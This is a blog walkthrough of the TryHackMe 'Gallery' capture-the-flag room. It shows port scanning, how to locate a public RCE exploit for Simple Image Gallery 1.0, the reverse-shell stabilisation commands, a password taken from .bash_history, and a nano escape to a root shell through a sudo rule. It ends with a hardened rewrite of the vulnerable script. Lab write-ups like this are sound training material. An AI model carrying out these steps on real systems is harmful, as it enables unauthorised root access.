Hi, my name is Vitalii Rudnykh 👋

Jun 19, 2022

📝 TryHackMe. Walkthrough: Gallery


Task 1.

How many ports are open?

$ nmap -A 10.10.240.133
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Answer: *


What’s the name of the CMS?

The gallery is served on port 8080; the CMS name is in its page title.

Answer: S****e ****e *****ry


What’s the hash password of the admin user?

$ searchsploit Simple Image Gallery
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabiliti | php/webapps/49064.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross- | php/webapps/44104.txt
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)          | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection                              | php/webapps/50198.txt
---------------------------------------------------------------------------------- ---------------------------------

$ searchsploit -m 50214
  Exploit: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/50214
     Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/50214.py
File Type: Python script text executable, Unicode text, UTF-8 text, with very long lines (816)

pic 1

Run the exploit, catch the reverse shell and stabilize it:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# press CTRL+Z to background the shell, then run the next line on the attacker machine
stty raw -echo ; fg
reset
[ These commands give us a fully functional shell. ]

Find the file with credentials for the database.

Next, upload adminer.php for a convenient database connection (or use the terminal) and look up the users table.

pic 2

Answer: ****************79***be5********


What’s the user flag?

Exploring the file system, we find a backup of the home directory of the user mike. Its .bash_history contains mike's password, so we try to log in with it.

Once logged in as mike, all that is left is to go to /home/mike/ and read the file with the flag.


Task 2.

What’s the root flag?

Check what mike is allowed to run with sudo.

mike@gallery:/$ sudo --list
User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

Let’s read rootkit.sh.

mike@gallery:/$ cat /opt/rootkit.sh
#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

Run sudo /bin/bash /opt/rootkit.sh, choose the read option, and break out of nano into a root shell:

^R^X
reset; sh 1>&0 2>&0

Answer: T*M{************3adfa6b8b************de87}
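The root step works because the sudo rule hands mike an interactive editor running as root, and nano (like most editors and pagers) can spawn a shell. As an added example that is not part of the room or of this write-up, here is a rewrite of /opt/rootkit.sh that keeps the same menu but prints the report with cat instead of opening it in nano; only the report path and the rkhunter commands are taken from the original script, the rest is my own construction.

```shell
#!/bin/bash
# Hardened replacement for /opt/rootkit.sh (added example, not the room's script).
# The original opens /root/report.txt in nano, an interactive editor that can drop
# to a shell; here the report is streamed read-only with cat, and the menu is a
# fixed allow-list that never evaluates user-supplied text.
set -eu

REPORT=/root/report.txt   # path taken from the original script

# Map a menu choice to the exact command line it is allowed to run.
# Prints the command, or prints nothing and returns 1 for anything else.
resolve_choice() {
    case "$1" in
        versioncheck) printf '%s\n' '/usr/bin/rkhunter --versioncheck' ;;
        update)       printf '%s\n' '/usr/bin/rkhunter --update' ;;
        list)         printf '%s\n' '/usr/bin/rkhunter --list' ;;
        read)         printf '%s\n' "/bin/cat $REPORT" ;;
        *)            return 1 ;;
    esac
}

main() {
    local ans cmd
    printf 'Would you like to versioncheck, update, list or read the report ? '
    read -r ans
    if ! cmd=$(resolve_choice "$ans"); then
        echo "unknown option: $ans" >&2
        exit 1
    fi
    # $cmd is one of the four fixed strings above, so word-splitting it is safe.
    exec $cmd
}

# The menu is interactive, so only start it when stdin is a terminal.
if [ -t 0 ]; then
    main
fi
```

The sudoers entry can stay as it is; the script itself must remain root-owned and not writable by mike, otherwise the allow-list is pointless.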